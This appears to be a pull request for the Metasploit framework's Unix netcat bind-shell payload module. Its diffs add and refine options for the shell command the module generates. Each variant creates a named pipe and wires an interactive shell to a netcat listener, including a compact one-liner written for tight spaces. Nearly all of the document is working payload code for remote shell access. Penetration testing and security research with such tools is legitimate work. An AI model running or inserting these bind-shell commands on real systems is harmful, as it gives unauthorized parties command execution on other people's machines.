### PR TITLE
Add support for short command execution in bind_netcat module

### DIFF
--- a/modules/payloads/singles/cmd/unix/bind_netcat.rb
+++ b/modules/payloads/singles/cmd/unix/bind_netcat.rb
@@ -36,7 +36,8 @@ module MetasploitModule
     register_advanced_options(
       [
         OptString.new('NetcatPath', [true, 'The path to the Netcat executable', 'nc']),
-        OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh'])
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh']),
+        OptBool.new('ShortCommand', [false, 'Use a shorter command string (hardcoded mkfifo name and shell)', false])
       ]
     )
   end
@@ -53,7 +54,12 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    backpipe = Rex::Text.rand_text_alpha_lower(4..7)
-    "mkfifo /tmp/#{backpipe}; (#{datastore['NetcatPath']} -l -p #{datastore['LPORT']} ||#{datastore['NetcatPath']} -l #{datastore['LPORT']})0</tmp/#{backpipe} | #{datastore['ShellPath']} >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
+    if datastore['ShortCommand']
+      payload = "mkfifo p;sh -i<p 2>&1|nc -l #{datastore['LPORT']}>p"
+    else
+      backpipe = Rex::Text.rand_text_alpha_lower(4..7)
+      payload = "mkfifo /tmp/#{backpipe}; (#{datastore['NetcatPath']} -l -p #{datastore['LPORT']} ||#{datastore['NetcatPath']} -l #{datastore['LPORT']})0</tmp/#{backpipe} | #{datastore['ShellPath']} >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
+    end
+    payload
   end
 end

--- a/modules/payloads/singles/cmd/unix/bind_netcat.rb
+++ b/modules/payloads/singles/cmd/unix/bind_netcat.rb
@@ -36,6 +36,7 @@ module MetasploitModule
     register_advanced_options(
       [
         OptString.new('NetcatPath', [true, 'The path to the Netcat executable', 'nc']),
+        OptEnum.new('NetcatFlavor', [true, 'The flavor of Netcat to use', 'auto', ['auto', 'default', 'openbsd']]),
         OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh']),
         OptString.new('FifoPath', [true, 'The path to the FIFO file to use, default is random', "/tmp/#{Rex::Text.rand_text_alpha_lower(4..7)}"]),
         OptBool.new('DeleteFifo', [true, 'Whether to delete the FIFO file after execution', true])
@@ -55,7 +56,19 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    command = "mkfifo #{datastore['FifoPath']}; #{datastore['ShellPath']} -i <#{datastore['FifoPath']} 2>&1 | #{datastore['NetcatPath']} -lp #{datastore['LPORT']} >#{datastore['FifoPath']}"
+    nc_linux = "#{datastore['NetcatPath']} -lp #{datastore['LPORT']}"
+    nc_openbsd = "#{datastore['NetcatPath']} -l #{datastore['LPORT']}"
+    nc_auto = "(#{nc_linux} || #{nc_openbsd})"
+    command = "mkfifo #{datastore['FifoPath']}; #{datastore['ShellPath']} -i <#{datastore['FifoPath']} 2>&1 |"
+    case datastore['NetcatFlavor']
+    when 'default'
+      command += " #{nc_linux}"
+    when 'openbsd'
+      command += " #{nc_openbsd}"
+    else
+      command += " #{nc_auto}"
+    end
+    command += ">#{datastore['FifoPath']}"
     command += "; rm #{datastore['FifoPath']}" if datastore['DeleteFifo']
     command
   end

--- a/modules/payloads/singles/cmd/unix/bind_netcat.rb
+++ b/modules/payloads/singles/cmd/unix/bind_netcat.rb
@@ -55,7 +55,7 @@ module MetasploitModule
   #
   def command_string
     if datastore['ShortCommand']
-      payload = "mkfifo p;sh -i<p 2>&1|nc -l #{datastore['LPORT']}>p"
+      payload = "mkfifo p;#{datastore["ShellPath"]} -i<p 2>&1|#{datastore["NetcatPath"]} -l #{datastore['LPORT']}>p"
     else
       backpipe = Rex::Text.rand_text_alpha_lower(4..7)
       payload = "mkfifo /tmp/#{backpipe}; (#{datastore['NetcatPath']} -l -p #{datastore['LPORT']} ||#{datastore['NetcatPath']} -l #{datastore['LPORT']})0</tmp/#{backpipe} | #{datastore['ShellPath']} >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"

--- a/modules/payloads/singles/cmd/unix/bind_netcat.rb
+++ b/modules/payloads/singles/cmd/unix/bind_netcat.rb
@@ -37,7 +37,8 @@ module MetasploitModule
       [
         OptString.new('NetcatPath', [true, 'The path to the Netcat executable', 'nc']),
         OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh']),
-        OptBool.new('ShortCommand', [false, 'Use a shorter command string (hardcoded mkfifo name and shell)', false])
+        OptString.new('FifoPath', [true, 'The path to the FIFO file to use, default is random', "/tmp/#{Rex::Text.rand_text_alpha_lower(4..7)}"]),
+        OptBool.new('DeleteFifo', [true, 'Whether to delete the FIFO file after execution', true])
       ]
     )
   end
@@ -54,12 +55,8 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    if datastore['ShortCommand']
-      payload = "mkfifo p;#{datastore["ShellPath"]} -i<p 2>&1|#{datastore["NetcatPath"]} -l #{datastore['LPORT']}>p"
-    else
-      backpipe = Rex::Text.rand_text_alpha_lower(4..7)
-      payload = "mkfifo /tmp/#{backpipe}; (#{datastore['NetcatPath']} -l -p #{datastore['LPORT']} ||#{datastore['NetcatPath']} -l #{datastore['LPORT']})0</tmp/#{backpipe} | #{datastore['ShellPath']} >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
-    end
-    payload
+    command = "mkfifo #{datastore['FifoPath']}; #{datastore['ShellPath']} -i <#{datastore['FifoPath']} 2>&1 | #{datastore['NetcatPath']} -lp #{datastore['LPORT']} >#{datastore['FifoPath']}"
+    command += "; rm #{datastore['FifoPath']}" if datastore['DeleteFifo']
+    command
   end
 end


### PR DESCRIPTION
Update the `unix/bind_netcat` with a shorter version, useful for tight spaces
